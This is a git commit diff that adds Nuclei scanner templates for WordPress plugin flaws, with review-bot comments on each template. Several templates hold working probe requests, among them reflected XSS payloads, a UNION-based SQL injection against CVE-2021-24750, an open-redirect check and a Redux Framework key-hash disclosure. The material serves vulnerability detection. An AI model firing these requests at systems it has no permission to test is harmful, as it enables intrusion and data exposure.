Commit
1 parent 7209f40, commit d9f1761
Showing 93 changed files with 5,144 additions and 1 deletion.
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -1 +1 @@ | ||
20241218 | ||
20241219 |
poc/auth/accept-authorize-net-payments-using-contact-form-7.yaml (59 changes: 59 additions & 0 deletions)
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,59 @@ | ||
id: accept-authorize-net-payments-using-contact-form-7-236bcbdbfe25f4f674ac30a10158deed | ||
|
||
info: | ||
name: > | ||
Accept Authorize.NET Payments Using Contact Form 7 <= 2.2 - Unauthenticated Information Exposure | ||
author: topscoder | ||
severity: low | ||
description: > | ||
reference: | ||
- https://github.com/topscoder/nuclei-wordfence-cve | ||
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d8801b9a-afcb-483b-a018-4f68448e96de?source=api-scan | ||
classification: | ||
cvss-metrics: | ||
cvss-score: | ||
cve-id: | ||
metadata: | ||
fofa-query: "wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/" | ||
google-query: inurl:"/wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/" | ||
shodan-query: 'vuln:' | ||
tags: cve,wordpress,wp-plugin,accept-authorize-net-payments-using-contact-form-7,low | ||
|
||
http: | ||
- method: GET | ||
redirects: true | ||
max-redirects: 3 | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/readme.txt" | ||
|
||
extractors: | ||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
internal: true | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
- type: regex | ||
name: version | ||
part: body | ||
group: 1 | ||
regex: | ||
- "(?mi)Stable tag: ([0-9.]+)" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
words: | ||
- "accept-authorize-net-payments-using-contact-form-7" | ||
part: body | ||
|
||
- type: dsl | ||
dsl: | ||
- compare_versions(version, '<= 2.2') |
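Review bot: `description: >`, `cvss-metrics:`, `cvss-score:` and `cve-id:` in the `info` block are all empty, so the template ships with a null description and a `classification` block carrying no data while `tags` still claims `cve`; either fill them from the Wordfence advisory listed under `reference` or drop the empty keys and the `cve` tag. `shodan-query: 'vuln:'` is an unfinished placeholder and should be removed. Note also that the check is purely version-based (`Stable tag` scraped from `readme.txt`, then `compare_versions(version, '<= 2.2')`), so a match means "a vulnerable version string is advertised", not that the information exposure was observed; a sentence in `description` saying so would help triage. The two `regex` extractors are identical apart from `internal: true`; the second only exists to print the version, which is fine but deserves a comment.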
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,17 @@ | ||
id: amazon-docker-config-disclosure | ||
|
||
info: | ||
name: Dockerrun AWS Configuration Exposure | ||
author: pd-team | ||
severity: medium | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/Dockerrun.aws.json' | ||
matchers: | ||
- type: word | ||
words: | ||
- 'AWSEBDockerrunVersion' | ||
- 'containerDefinitions' | ||
condition: and |
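Review bot: this template uses the older `requests:` key while the first template in this commit already uses `http:`; current nuclei releases accept both, but the repository should settle on one. The `info` block also lacks `description`, `reference` and `tags`, so the finding can neither be filtered nor explained in output, and the word matcher has no status check; adding `- type: status` with `200` under `matchers-condition: and`, as the other templates in this commit do, keeps behaviour consistent and rules out matches on non-200 responses.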
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,17 @@ | ||
id: amazon-docker-config-disclosure | ||
|
||
info: | ||
name: Dockerrun AWS Configuration Exposure | ||
author: pd-team | ||
severity: medium | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/Dockerrun.aws.json' | ||
matchers: | ||
- type: word | ||
words: | ||
- 'AWSEBDockerrunVersion' | ||
- 'containerDefinitions' | ||
condition: and |
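Review bot: this hunk is byte-identical to the preceding one, down to `id: amazon-docker-config-disclosure`. The rendered diff dropped the file paths, so it is not visible whether these are two separate files, but if they are, nuclei's template validation flags duplicate IDs and only one copy is useful; remove one copy or give it a distinct `id`. The same remarks as on the previous hunk (`requests:` vs `http:`, missing `description`/`reference`/`tags`, no status matcher) apply here.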
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,30 @@ | ||
id: CVE-2012-0901 | ||
|
||
info: | ||
name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS) | ||
author: daffainfo | ||
severity: medium | ||
description: Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. | ||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901 | ||
|
||
|
||
requests: | ||
- method: GET | ||
path: | ||
- '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
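Review bot: `reference:` is written as a bare scalar here whereas every other template in this commit uses a list; nuclei accepts both forms, but the `info` block is also missing `tags` and a `classification` block (the advisory on the `reference` line gives CVE-2012-0901 and `description` identifies the issue as XSS, i.e. CWE-79), both of which the other CVE templates in this commit carry. The two consecutive blank lines between `reference` and `requests` can be collapsed to one.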
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,37 @@ | ||
id: CVE-2014-4544 | ||
|
||
info: | ||
name: Podcast Channels < 0.28 - Unauthenticated Reflected XSS | ||
author: daffainfo | ||
severity: medium | ||
description: The Podcast Channels WordPress plugin was affected by an Unauthenticated Reflected XSS security vulnerability. | ||
reference: | ||
- https://wpscan.com/vulnerability/72a5a0e1-e720-45a9-b9d4-ee3144939abb | ||
- https://nvd.nist.gov/vuln/detail/CVE-2014-4544 | ||
|
||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2014-4544 | ||
cwe-id: CWE-79 | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-content/plugins/podcast–channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&" | ||
|
||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
words: | ||
- "</script><script>alert(document.domain)</script>" | ||
part: body | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- text/html | ||
|
||
- type: status | ||
status: | ||
- 200 |
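Review bot: the plugin directory in the `path` entry is spelled `podcast–channels` with a U+2013 en dash rather than a hyphen, so the request would never reach a real `podcast-channels` install and the template is a guaranteed false negative; fix the slug before merging. The trailing `&` on the same URL is harmless but should go, and `tags` is missing from `info` even though `classification` is otherwise complete.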
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,43 @@ | ||
id: CVE-2021-24750 | ||
|
||
info: | ||
name: WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 SQLI | ||
author: cckuakilong | ||
severity: high | ||
description: The WP Visitor Statistics (Real Time Traffic) WordPress plugin before 4.8 does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks. | ||
reference: | ||
- https://github.com/fimtow/CVE-2021-24750/blob/master/exploit.py | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24750 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | ||
cvss-score: 8.8 | ||
cve-id: CVE-2021-24750 | ||
cwe-id: CWE-89 | ||
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST /wp-login.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
Origin: {{RootURL}} | ||
Content-Type: application/x-www-form-urlencoded | ||
Cookie: wordpress_test_cookie=WP%20Cookie%20check | ||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 | ||
- | | ||
GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1 | ||
Host: {{Hostname}} | ||
cookie-reuse: true | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- "266f89556d2b38ff067b580fb305c522" | ||
|
||
- type: status | ||
status: | ||
- 200 |
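Review bot: the raw login request consumes `{{username}}` and `{{password}}`, but neither is declared in a `variables:` block or mentioned in `description`, so the template does nothing useful unless the operator supplies them with `-var`; state that requirement explicitly (the `authenticated` tag alone is not enough). This hunk also uses the `requests:` key rather than `http:`, unlike the first template in this commit. The match on the fixed md5 of the marker string is a clean, non-destructive confirmation, so no change is needed in `matchers`.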
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,26 @@ | ||
id: CVE-2021-25111 | ||
|
||
info: | ||
name: English WordPress Admin < 1.5.2 - Unauthenticated Open Redirect | ||
author: akincibor | ||
severity: medium | ||
description: The plugin does not validate the admin_custom_language_return_url before redirecting users o it, leading to an open redirect issue. | ||
reference: | ||
- https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4 | ||
tags: wp-plugin,redirect,wordpress,wp,cve,cve2021,unauth | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.10 | ||
cve-id: CVE-2021-25111 | ||
cwe-id: CWE-601 | ||
|
||
requests: | ||
- method: GET | ||
path: | ||
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh" | ||
|
||
matchers: | ||
- type: regex | ||
part: header | ||
regex: | ||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 |
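Review bot: `description` has a typo, "redirecting users o it" should read "redirecting users to it". `matchers` checks only the `Location` header regex with no status matcher, which is acceptable for an open-redirect check because the regex already requires `interact.sh` to be the redirect target; the regex101 link in the trailing comment is a good habit. `reference` could also carry the NVD entry for CVE-2021-25111 in the same form the other templates in this commit use.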
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,51 @@ | ||
id: CVE-2021-38314 | ||
|
||
info: | ||
name: Redux Framework - Unauthenticated Sensitive Information Disclosure | ||
author: meme-lord | ||
severity: medium | ||
reference: | ||
- https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/ | ||
- https://wahaz.medium.com/unauthenticated-sensitive-information-disclosure-at-redacted-2702224098c | ||
- https://blog.sorcery.ie/posts/redux_wordpress/ | ||
|
||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N | ||
cvss-score: 5.30 | ||
cve-id: CVE-2021-38314 | ||
description: "The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the `includes` function in `redux-core/class-redux-core.php` that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s `AUTH_KEY` concatenated with the `SECURE_AUTH_KEY`." | ||
|
||
requests: | ||
- raw: | ||
- | | ||
GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1 | ||
Host: {{Hostname}} | ||
Accept: */* | ||
- | | ||
GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1 | ||
Host: {{Hostname}} | ||
Accept: */* | ||
stop-at-first-match: true | ||
matchers-condition: and | ||
matchers: | ||
- type: dsl | ||
dsl: | ||
- "len(body)<50" | ||
|
||
- type: regex | ||
name: meme | ||
regex: | ||
- '[a-f0-9]{32}' | ||
part: body | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
|
||
extractors: | ||
- type: regex | ||
part: body | ||
regex: | ||
- "[a-f0-9]{32}" |
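Review bot: the regex matcher at the end of `matchers` is named `meme`, a placeholder rather than a descriptive name; rename it (for example `md5-hash`) or drop `name` entirely, since matcher names only matter when `matchers-condition` is `or`. The `info` block lacks `tags` and a `cwe-id`, and the `[a-f0-9]{32}` pattern is repeated verbatim in the matcher and the extractor; that is functionally fine, but a short comment saying the extracted value is the unsalted md5 described in `description` would explain why it is exported.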
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,52 @@ | ||
id: CVE-2021-39322 | ||
|
||
info: | ||
name: WordPress Easy Social Icons Plugin < 3.0.9 - Reflected Cross-Site Scripting | ||
author: dhiyaneshDK | ||
severity: medium | ||
description: The Easy Social Icons plugin <= 3.0.8 for WordPress echoes out the raw value of `$_SERVER['PHP_SELF']` in its main file. On certain configurations including Apache+modPHP this makes it possible to use it to perform a reflected cross-site scripting attack by injecting malicious code in the request path. | ||
reference: | ||
- https://wpscan.com/vulnerability/5e0bf0b6-9809-426b-b1d4-1fb653083b58 | ||
- https://nvd.nist.gov/vuln/detail/CVE-2021-39322 | ||
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39322 | ||
- https://wpvulndb.com/vulnerabilities/5e0bf0b6-9809-426b-b1d4-1fb653083b58 | ||
classification: | ||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N | ||
cvss-score: 6.1 | ||
cve-id: CVE-2021-39322 | ||
cwe-id: CWE-79 | ||
tags: wordpress,cve,cve2021,wp-plugin,authenticated | ||
|
||
requests: | ||
- raw: | ||
- | | ||
POST /wp-login.php HTTP/1.1 | ||
Host: {{Hostname}} | ||
Origin: {{RootURL}} | ||
Content-Type: application/x-www-form-urlencoded | ||
Cookie: wordpress_test_cookie=WP%20Cookie%20check | ||
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 | ||
- | | ||
GET /wp-admin/admin.php/</script><script>alert(document.domain)</script>/?page=cnss_social_icon_page HTTP/1.1 | ||
Host: {{Hostname}} | ||
cookie-reuse: true | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: body | ||
words: | ||
- '</script><script>alert(document.domain)</script>' | ||
|
||
- type: status | ||
status: | ||
- 200 | ||
|
||
- type: word | ||
part: header | ||
words: | ||
- "text/html" | ||
|
||
# Enhanced by mp on 2022/03/23 |
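Review bot: as with CVE-2021-24750 in this commit, the login request relies on undeclared `{{username}}`/`{{password}}` variables; the `authenticated` tag signals the requirement, but a `variables:` block or a sentence in `description` should state it. `name` (`< 3.0.9`) and `description` (`<= 3.0.8`) agree, but the `requests:` key and `cvss-score: 6.1` (versus `6.10` elsewhere in this commit) are inconsistent with the neighbouring templates. Placing the payload unencoded in the raw request path is intentional for the `PHP_SELF` reflection described, and the `text/html` header matcher is the right extra guard against matches on JSON or plain-text echoes.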